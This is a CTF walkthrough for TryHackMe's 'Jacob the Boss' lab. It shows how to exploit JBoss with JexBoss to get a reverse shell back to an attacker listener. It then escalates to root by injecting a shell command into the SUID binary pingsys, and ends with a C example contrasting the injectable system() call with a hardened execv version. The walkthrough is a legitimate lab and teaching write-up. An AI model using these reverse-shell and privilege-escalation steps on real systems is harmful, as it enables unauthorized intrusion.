Jacob the Boss

Try Hack Me

Introduction

Well, the flaw that makes up this box is a reproduction of one found in a customer's production environment a while ago. The verification at the time consisted of two steps, the last one inside the environment; we hit it head-on, and more than 15 machines turned out to be vulnerable, which together with the development team we were able to correct and adapt.

First of all, add the jacobtheboss.box address to your hosts file.

Anyway, learn a little more, have fun!

We add jacobtheboss.box to the /etc/hosts file so the hostname resolves to the target:

sudo nano /etc/hosts

<target IP> jacobtheboss.box

Enumeration

We always start by scanning the target IP for open ports with Nmap.

The ports that grab attention are 80 (Dotclear) and 8080 (JBoss).

Exploitation

USER.TXT

As soon as I saw JBoss I knew it was the target, given that the box is named Jacob the Boss.

Searching Google for "jboss exploitation" turns up a GitHub project, JexBoss, which we will use for the exploitation.

We will install the project using the command:

git clone project git link

To install the required dependencies we run:

pip install -r requires.txt

And to run the exploit we do:

python jexboss.py -host http://jacobtheboss.box:8080/

Once JexBoss gives us its pseudo-shell, we open a listener on our Kali attacker machine:

nc -nlvp PORT

Then, in the exploit shell, we run:

jexremote=IP:PORT

This gives us a non-interactive reverse shell; to upgrade it to a proper TTY we run:

python -c 'import pty; pty.spawn("/bin/bash")'

After that we can print our first flag:

cat /home/jacob/user.txt

Answer Hidden as per THM request - for more HELP 👉 TROLL ME

ROOT.TXT

It is time to escalate from the user jacob to root.

To do so we look for SUID binaries owned by root, to see if any of them can be abused to escalate our privileges.

The command we use:

find / -perm -u=s 2>/dev/null

The interesting file we find is /usr/bin/pingsys

pingsys passes its argument to a shell without sanitising it, so a `;` terminates the ping and starts /bin/sh with the binary's root privileges. We run:

/usr/bin/pingsys '127.0.0.1;/bin/sh'

And boom we become root!
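To show why the `;` trick works, here is an added example written for this writeup. It is not the pingsys source (which is not on the page); the structure is an assumption about the bug class, namely a SUID root binary that pastes its argument into a command string for system(). The vulnerable wrapper is shown beside a hardened one that validates the argument against an allow-list, drops the inherited root uid, and execs ping with an argv so no shell ever parses the input. The attacker input "127.0.0.1;/bin/sh" is the page's own payload; everything else is constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/*
 * Hypothetical reconstruction of the pingsys bug class.  Assumption: the
 * real binary is SUID root and builds "ping ... <arg>" for a shell; the
 * page only shows that '127.0.0.1;/bin/sh' yields a root shell.
 */

/* VULNERABLE: the argument is pasted into a shell command line.  system()
 * runs it through /bin/sh -c, so ';', '|', '&', backticks and $() in
 * `target` are interpreted, and under SUID root the injected command runs
 * as root.  "127.0.0.1;/bin/sh" -> one ping, then an interactive root shell. */
int ping_via_system(const char *target)
{
    char cmd[512];
    if (snprintf(cmd, sizeof cmd, "/bin/ping -c 1 %s", target) >= (int)sizeof cmd)
        return -1;
    return system(cmd);
}

/* Allow-list check: returns 1 only for a dotted-quad IPv4 literal
 * (four octets, each 1-3 digits, value 0-255), else 0.  Anything that is
 * not a digit or a dot, including ';', is rejected.                         */
int is_ipv4_literal(const char *s)
{
    int octets = 0;
    while (*s) {
        if (*s < '0' || *s > '9')
            return 0;                       /* ';' ' ' letters ... all stop here */
        int value = 0, digits = 0;
        while (*s >= '0' && *s <= '9') {
            value = value * 10 + (*s - '0');
            if (++digits > 3 || value > 255)
                return 0;
            s++;
        }
        octets++;
        if (*s == '.') {
            if (octets == 4 || s[1] == '\0')
                return 0;                   /* too many octets / trailing dot */
            s++;
        } else if (*s != '\0') {
            return 0;
        }
    }
    return octets == 4;
}

/* HARDENED: validate first, drop the SUID-inherited uid in the child, then
 * exec ping directly.  The target is a single argv element, never parsed by
 * a shell.  Returns ping's exit status, or -1 if the input is rejected or
 * the process could not be run.                                              */
int ping_via_execv(const char *target)
{
    if (!is_ipv4_literal(target))
        return -1;                          /* rejected before anything executes */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setuid(getuid()) != 0)          /* drop root; /bin/ping carries its own
                                               capability/SUID bit if it needs raw sockets */
            _exit(127);
        char *const argv[] = { (char *)"/bin/ping", (char *)"-c", (char *)"1",
                               (char *)target, NULL };
        execv(argv[0], argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    /* constructed attacker input, the same payload used against pingsys */
    const char *target = argc > 1 ? argv[1] : "127.0.0.1;/bin/sh";
    printf("is_ipv4_literal(\"%s\") = %d\n", target, is_ipv4_literal(target));
    printf("ping_via_execv returned %d\n", ping_via_execv(target));
    return 0;
}
```

The stand-alone main deliberately calls only the hardened path; calling ping_via_system() with the default payload would spawn a shell. The two defences are independent: the allow-list stops the injection, and exec-with-argv removes the shell that made the injection possible in the first place, so even a weaker validator would not hand an attacker a command line.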

Answer Hidden as per THM request - for more HELP 👉 TROLL ME